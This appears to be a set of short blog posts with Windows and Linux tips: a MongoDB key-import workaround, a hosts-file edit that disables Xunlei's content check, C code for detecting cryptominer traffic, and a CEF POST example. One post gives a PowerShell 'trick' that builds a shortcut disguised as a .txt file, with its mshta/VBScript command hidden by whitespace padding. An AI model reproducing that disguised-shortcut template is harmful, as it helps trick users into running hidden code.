Articles posted by 小坏

A pitfall when importing the public key for MongoDB 4.0 on WSL Ubuntu

The repository ships MongoDB 3.x by default.

But I wanted 4.0, so I followed the first step of the official MongoDB docs and imported the public key:

sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv 9DA31620334BD75D9DCB49F368818C72E52529D4

which produced the following error:

gpg: connecting dirmngr at '/tmp/apt-key-gpghome.OoGLcR7JCb/S.dirmngr' failed: IPC connect call failed
gpg: keyserver receive failed: No dirmngr


Workaround:

Open the following URL in a browser (it searches the Ubuntu keyserver for "mongodb 4.0"):

http://keyserver.ubuntu.com/pks/lookup?search=mongodb%204.0&op=vindex

Search result:

pub  4096R/E52529D4 2018-04-18
uid  MongoDB 4.0 Release Signing Key <packaging@mongodb.com>
sig  sig3  E52529D4 2018-04-18 __________ 2023-04-17 [selfsig]

Click E52529D4 to open the key details; the very first line of the details page, in large type, reads:


Public Key Server -- Get "0x68818c72e52529d4 "

Copy the string 0x68818c72e52529d4 and run the following command to import the key:

curl -sL "http://keyserver.ubuntu.com/pks/lookup?op=get&search=0x68818c72e52529d4" | sudo apt-key add

A successful import prints OK.

Then run apt-get update to refresh the package cache.

Once that finishes, apt-get install -y mongodb-org

completes the installation.



The same method works for other software whose public-key import fails with IPC connect call failed.

One trick with .lnk files.

$Shell = New-Object -ComObject WScript.Shell
$Dir = Split-Path -Parent $MyInvocation.MyCommand.Definition
$Shortcut = $Shell.CreateShortcut("$Dir\test.txt.lnk")
$Shortcut.TargetPath = "%Windir%\System32\mshta.exe"
$Shortcut.IconLocation = "shell32.dll,70"
$Shortcut.Arguments ='                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               vbscript:CreateObject("WScript.Shell").Run("cmd.exe",5)(window.close)'

$Shortcut.Save()



Save it as a .ps1 file and run it with PowerShell.

It generates a test.lnk whose icon is that of a txt file.

Fixing 迅雷 downloads that report "the task contains prohibited content"

Open CMD or PowerShell as administrator, enter the command below and press Enter:

Echo 0.0.0.0 hub5idx.shub.sandai.net>>%Windir%\System32\drivers\etc\hosts

This works by blocking the domain hub5idx.shub.sandai.net.

If you can log in to your router or a similar device, you can block the domain there instead,

once and for all.



Using SIO_RCVALL packet capture for a simple search for mining trojans

This is only a simple technical study and is not guaranteed to be 100% reliable.

#include <winsock2.h>
#include <ws2tcpip.h>
#include <mstcpip.h>                 /* SIO_RCVALL */
#include <string.h>
#include <stdlib.h>
#pragma comment(lib, "ws2_32.lib")

/* Minimal IPv4 and TCP header layouts; only the fields used below matter. */
typedef struct {
    unsigned char  ip_header_len : 4, ip_version : 4; /* length in 32-bit words */
    unsigned char  ip_tos;
    unsigned short ip_total_length, ip_id, ip_frag_offset;
    unsigned char  ip_ttl, ip_protocol;               /* 6 = TCP */
    unsigned short ip_checksum;
    unsigned int   ip_srcaddr, ip_destaddr;
} IPV4_HDR;

typedef struct {
    unsigned short source_port, dest_port;
    unsigned int   sequence, acknowledge;
    unsigned char  reserved : 4, data_offset : 4;     /* length in 32-bit words */
    unsigned char  flags;
    unsigned short window, checksum, urgent_pointer;
} TCP_HDR;

/* the following runs inside main(); error handling omitted for brevity */
WSADATA wsa; struct hostent *he; char hostname[256];
struct sockaddr_in LocalAddr = {0};

WSAStartup(MAKEWORD(2, 2), &wsa);
SOCKET hSniffer = socket(AF_INET, SOCK_RAW, IPPROTO_IP);

/* SIO_RCVALL needs the socket bound to a real local interface address
   (INADDR_NONE cannot be bound), so bind to this host's first IPv4 address */
gethostname(hostname, sizeof(hostname));
he = gethostbyname(hostname);
LocalAddr.sin_family = AF_INET;
LocalAddr.sin_port = 0;
memcpy(&LocalAddr.sin_addr, he->h_addr_list[0], sizeof(struct in_addr));
bind(hSniffer, (struct sockaddr *)&LocalAddr, sizeof(LocalAddr));

DWORD sioarg = 1, dwValue = 0;
WSAIoctl(hSniffer, SIO_RCVALL, &sioarg, sizeof(DWORD), 0, 0, &dwValue, 0, 0);
/* SIO_RCVALL switches the bound interface into capture-everything mode */

char *Buffer = (char *)malloc(65536);
int n = recvfrom(hSniffer, Buffer, 65536, 0, 0, 0);
IPV4_HDR *IPHeader = (IPV4_HDR *)Buffer;
if (n > 0 && IPHeader->ip_protocol == 6) {            /* TCP only */
    /* both header lengths are in 32-bit words; the original added the TCP offset
       to a TCP_HDR pointer, which scales it by sizeof(TCP_HDR) */
    TCP_HDR *TCPHeader = (TCP_HDR *)(Buffer + IPHeader->ip_header_len * 4);
    char *lpszStr = Buffer + IPHeader->ip_header_len * 4 + TCPHeader->data_offset * 4;
    /* lpszStr now points at the TCP payload */
}

The packets of a mining program generally look like the following (note: this is not exhaustive):

{"jsonrpc":"2.0","method":"job","params":{"blob":"01009580fdd4055331f01c7f3a7c15f1d88ae82f82a862e88f854856bc05758100696a96c7475300000000522ab3a142b4935c04121364c53b36266999330985c21c61f234ffd0cdcbbe1e01","job_id":"771459633298218","target":"d8a30200"}}


{"id":3396,"jsonrpc":"2.0","method":"submit","params":{"id":"399161462602205","job_id":"794963340135291","nonce":"74a999d9","result":"13e887bf1e58ad20337f8da518d7abebcc449d754db036bbcfbe4ac9ca0a0000"}}


{"method": "submit", "params": {"id": "341404656460508", "job_id": "771459633298218", "nonce": "ef430500", "result": "4290fef7f43c544c2baebeaa6ce1a459f29cb03afef69517f33acf64237d0200"}, "id":4}


{"id":4,"jsonrpc":"2.0","error":null,"result":{"status":"OK"}}


Extract these keywords and match them against the captured TCP payload. When a packet carries these fixed signatures, take the address fields from the IPv4 header and the port fields from the TCP header and look them up in the connection table returned by GetExtendedTcpTable; pTcpTable->table[?].dwOwningPid is then the PID of the owning process.
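As an added example (not code from the post), here is a portable C version of the payload check described above: it walks the IPv4 and TCP headers by their length fields and then looks for the keyword combinations present in the quoted job and submit messages. The frame builder, its ports and its payloads are constructed test input; mapping the ports to a PID via GetExtendedTcpTable is left as in the text.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Verdict for one captured IPv4 frame; ports are in host byte order. */
typedef struct { int is_tcp; uint16_t src_port, dst_port; int looks_like_miner; } FrameVerdict;

/* Keyword combinations taken from the job/submit messages quoted above. */
int payload_matches_miner(const char *p, size_t n) {
    char buf[1024];                       /* NUL-terminated copy so strstr is safe */
    if (n >= sizeof buf) n = sizeof buf - 1;
    memcpy(buf, p, n); buf[n] = '\0';
    if (!strstr(buf, "\"method\"")) return 0;
    int job    = strstr(buf, "\"job\"")    && strstr(buf, "\"blob\"")  && strstr(buf, "\"target\"");
    int submit = strstr(buf, "\"submit\"") && strstr(buf, "\"nonce\"") && strstr(buf, "\"job_id\"");
    return job || submit;
}

/* Walk the IPv4 and TCP headers (both lengths are in 32-bit words) and hand
   the payload to the matcher. Returns is_tcp = 0 for anything that is not TCP. */
FrameVerdict inspect_frame(const uint8_t *pkt, size_t len) {
    FrameVerdict v = {0, 0, 0, 0};
    if (len < 20 || (pkt[0] >> 4) != 4) return v;
    size_t ihl = (size_t)(pkt[0] & 0x0F) * 4;
    if (ihl < 20 || len < ihl + 20 || pkt[9] != 6) return v;  /* protocol 6 = TCP */
    v.is_tcp = 1;
    const uint8_t *tcp = pkt + ihl;
    v.src_port = (uint16_t)(tcp[0] << 8 | tcp[1]);
    v.dst_port = (uint16_t)(tcp[2] << 8 | tcp[3]);
    size_t doff = (size_t)(tcp[12] >> 4) * 4;
    if (doff < 20 || len < ihl + doff) return v;
    v.looks_like_miner = payload_matches_miner((const char *)pkt + ihl + doff, len - ihl - doff);
    return v;
}

/* Constructed test frame: 20-byte IPv4 header + 20-byte TCP header + payload,
   checksums left zero. Returns the total frame length. */
size_t build_frame(uint8_t *out, uint16_t sport, uint16_t dport, const char *payload) {
    size_t n = strlen(payload), total = 20 + 20 + n;
    memset(out, 0, total);
    out[0] = 0x45;                                  /* version 4, IHL 5 words */
    out[2] = (uint8_t)(total >> 8); out[3] = (uint8_t)(total & 0xFF);
    out[9] = 6;                                     /* TCP */
    out[20] = (uint8_t)(sport >> 8); out[21] = (uint8_t)(sport & 0xFF);
    out[22] = (uint8_t)(dport >> 8); out[23] = (uint8_t)(dport & 0xFF);
    out[32] = 0x50;                                 /* data offset 5 words */
    memcpy(out + 40, payload, n);
    return total;
}
```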



Also, if the sample is the miner author's original build, it usually takes command-line parameters or keeps a config.json next to the EXE, so the process command line can be used as an additional clue.

Chromium Post

// CreateField is not part of CEF itself; a minimal DCEF3-style helper:
function CreateField(const str: ustring): ICefPostDataElement;
begin
  Result := TCefPostDataElementRef.New;
  Result.SetToBytes(Length(str), PAnsiChar(AnsiString(str)));
end;

var
  Header: ICefStringMultimap;
  Data: ICefPostData;
  Request: ICefRequest;
begin
  Request := TCefRequestRef.New;
  Request.Url := 'http://example.com/';
  Request.Method := 'POST';
  Request.Flags := WUR_FLAG_NONE;

  // form-encoded body, so set the matching Content-Type header
  Header := TCefStringMultimapOwn.Create;
  Header.Append('Content-Type', 'application/x-www-form-urlencoded');
  Request.SetHeaderMap(Header);

  // the elements are concatenated into one body: Data.id=27&Data.title=title&Data.body=body
  Data := TCefPostDataRef.New;
  Data.AddElement(CreateField('Data.id=27'));
  Data.AddElement(CreateField('&Data.title=title'));
  Data.AddElement(CreateField('&Data.body=body'));
  Request.PostData := Data;

  Chromium1.Browser.MainFrame.LoadRequest(Request);
end;